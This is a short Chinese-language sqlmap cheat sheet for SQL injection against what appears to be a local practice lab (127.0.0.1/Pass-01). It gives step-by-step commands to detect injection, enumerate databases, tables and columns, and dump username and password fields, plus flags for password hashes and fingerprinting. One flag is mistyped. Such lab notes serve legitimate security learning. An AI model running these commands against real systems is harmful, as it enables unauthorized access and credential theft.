注意:仅用于技术讨论,切勿用于其他用途,一切后果与本人无关。
最理想情况下的操作
一、检测是否存在注入点
sqlmap -u "https://127.0.0.1/Pass-01/index.php?id=1"
二、查询数据库信息
sqlmap -u "https://127.0.0.1/Pass-01/index.php?id=1" --dbs
三、通过数据库查询数据表信息
sqlmap -u "https://127.0.0.1/Pass-01/index.php?id=1" -D user --tables
四、通过数据表查询字段信息
sqlmap -u "https://127.0.0.1/Pass-01/index.php?id=1" -D user -T user --columns
五、通过字段枚举字段内容
sqlmap -u "https://127.0.0.1/Pass-01/index.php?id=1" -D user -T user -C "Id,password,username" --dump
其他指令:
一、查看数据库相关信息
--current-user 枚举当前用户
--current-db 枚举当前数据库
--dbs 枚举可用的数据库
--is--dba 枚举数据库权限
--password 枚举数据库用户密码
二、指纹识别
-f 启用广泛的指纹识别
-b 检测数据库指纹
--hostname 枚举主机名称